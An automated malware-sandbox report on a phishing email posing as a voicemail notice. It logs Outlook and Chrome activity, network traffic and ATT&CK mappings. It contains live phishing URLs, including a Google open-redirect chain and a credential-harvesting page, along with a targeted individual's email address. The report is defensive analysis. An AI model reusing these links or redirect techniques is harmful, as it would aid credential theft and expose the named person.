Windows Analysis Report
ee0b6b037b16b54632b6b37d1fb72727.eml

Overview

General Information

Sample name: ee0b6b037b16b54632b6b37d1fb72727.eml
Analysis ID: 1556705
MD5: 4b9e5facdef9a6a766716ef1a494d15c
SHA1: c7df5078fe1808cc06078c8d2629835732e97dc9
SHA256: 4d156810843e3438e761c4f3cbfecaccd29c4b64b2ea6aa73e54aed5283cf120

Detection

Score: 48
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected landing page (webpage, office document or email)
AI detected potential phishing Email
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Stores files to the Windows start menu directory
Stores large binary data to the registry

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6428 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\ee0b6b037b16b54632b6b37d1fb72727.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 7008 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "F05FBD8A-C85E-48DC-96FE-34574180FF3D" "A0019601-66DF-4798-A215-D39904F8E346" "6428" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 5156 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 6732 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=1760,i,5962285065134541861,7824030978840373784,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6908 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7424 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1964,i,10127388786673164989,1744962959261418216,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4608 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 3344 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1856,i,8679220859908409652,11221365071905276730,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6648 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 1948 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1996,i,17604088894808587731,15684709552865746859,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
Source: Registry Key set
  Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
  Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6428, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
No Suricata rule has matched

Phishing

Source: Email
  Joe Sandbox AI: Email contains prominent button: 'listen now'
  Joe Sandbox AI: Detected potential phishing email: Suspicious sender domain 'generous-minds.com' doesn't match the claimed identity 'Audio.calls'. Contains suspicious long encoded URL that attempts to mask its true destination. Subject line about voicemail doesn't match the email thread content, indicating a spoofed conversation
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638672984146514294.ZjEwZDA1N2MtYTZmYi00NDZhLWI0NzgtMGIxMGVlODI5OTY4NGNlN2Q5ZDQtZDMwMS00ODk0LThkYjItMWExMDE0MTA1MjM2&ui_locales=en-US&mkt=en-US&client-request-id=6b3a9544-16e1-4c10-8c8f-7d6b57526a48&state=Ypfozi8mv6aRmqUgZE_yVtS1wqc0XgLjs0ptdC4L1QPH4aC54o2Gxy-XrB5ky_xwvI5UL78AaIMWLDQy-WrdUyHBOO4-7PRov81fy-YqatpKs0_h7wqdrLDLFln6S8AyuKiob1ErA5f3YOL39PwDHHBwpOIK9FRBlW6Vxc1PtFosC52Eebt8BrviFe1jkC6qHXhw6kKJdj3x6vKmdIzIGsdrsxMJUJVkc0IrDxRC3EIjYCrLEak5d7OPEAaIGI9jQ4sqSNIzVnI4QS_3kjbIOKvgM4uojPbPjqNwW8ggupl7Gl8hJPqwEng9BagR78UXsDPl10DaEIyV5NTFwiap5Q&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0
  HTTP Parser: Number of links: 0
  HTTP Parser: Base64 decoded: f10d057c-a6fb-446a-b478-0b10ee8299684ce7d9d4-d301-4894-8db2-1a1014105236
  HTTP Parser: Title: Redirecting does not match URL
  HTTP Parser: No favicon
  HTTP Parser: No <meta name="author".. found
  HTTP Parser: No <meta name="copyright".. found
Source: the same URL with &sso_reload=true appended
  HTTP Parser: Number of links: 0
  HTTP Parser: Title: Sign in to your account does not match URL
  HTTP Parser: <input type="password" .../> found
  HTTP Parser: No <meta name="author".. found
  HTTP Parser: No <meta name="copyright".. found
Source: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com
  HTTP Parser: No favicon
Source: unknown
  HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49771 version: TLS 1.2
Source: chrome.exe
  Memory has grown: Private usage: 1MB later: 28MB
Source: global traffic
  TCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: unknown
  UDP traffic detected without corresponding DNS query: 1.1.1.1
  TCP traffic detected without corresponding DNS query: 20.190.160.20
  TCP traffic detected without corresponding DNS query: 192.229.211.108
  TCP traffic detected without corresponding DNS query: 20.189.173.10
  TCP traffic detected without corresponding DNS query: 204.79.197.203
  TCP traffic detected without corresponding DNS query: 1.1.1.1
  TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: global traffic
  HTTP traffic detected: GET /lockeq/wtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t HTTP/1.1
    Host: condominioanacarolina.com.br
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
  HTTP traffic detected: GET /favicon.ico HTTP/1.1
    Host: condominioanacarolina.com.br
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Referer: http://condominioanacarolina.com.br/lockeq/wtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
  Date: Fri, 15 Nov 2024 20:12:36 GMT
  Server: Apache
  Content-Length: 315
  Keep-Alive: timeout=5, max=99
  Connection: Keep-Alive
  Content-Type: text/html; charset=iso-8859-1
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: unknown
HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49771 version: TLS 1.2
Source: classification engine
Classification label: mal48.winEML@60/57@89/331
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241115T1512180845-6428.etl
Source: unknown
Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\ee0b6b037b16b54632b6b37d1fb72727.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "F05FBD8A-C85E-48DC-96FE-34574180FF3D" "A0019601-66DF-4798-A215-D39904F8E346" "6428" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t
Source: C:\Program Files\Google\Chrome\Application\chrome.exe
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=1760,i,5962285065134541861,7824030978840373784,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1964,i,10127388786673164989,1744962959261418216,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=1760,i,5962285065134541861,7824030978840373784,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1964,i,10127388786673164989,1744962959261418216,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1856,i,8679220859908409652,11221365071905276730,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1996,i,17604088894808587731,15684709552865746859,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: c2r64.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InProcServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Window found: window name: SysTabControl32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\outlook\ConfigContextData 1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE File Volume queried: C:\Windows\SysWOW64 FullSizeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information queried: ProcessInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Queries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 2 Browser Extensions | 1 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Process Discovery | Remote Services | Data from Local System | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 1 Registry Run Keys / Startup Folder | 1 Modify Registry | LSASS Memory | 13 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Process Injection | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Extra Window Memory Injection | 1 DLL Side-Loading | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Extra Window Memory Injection | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact

No Antivirus matches
Source | Detection | Scanner | Label | Link
http://condominioanacarolina.com.br/favicon.ico | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
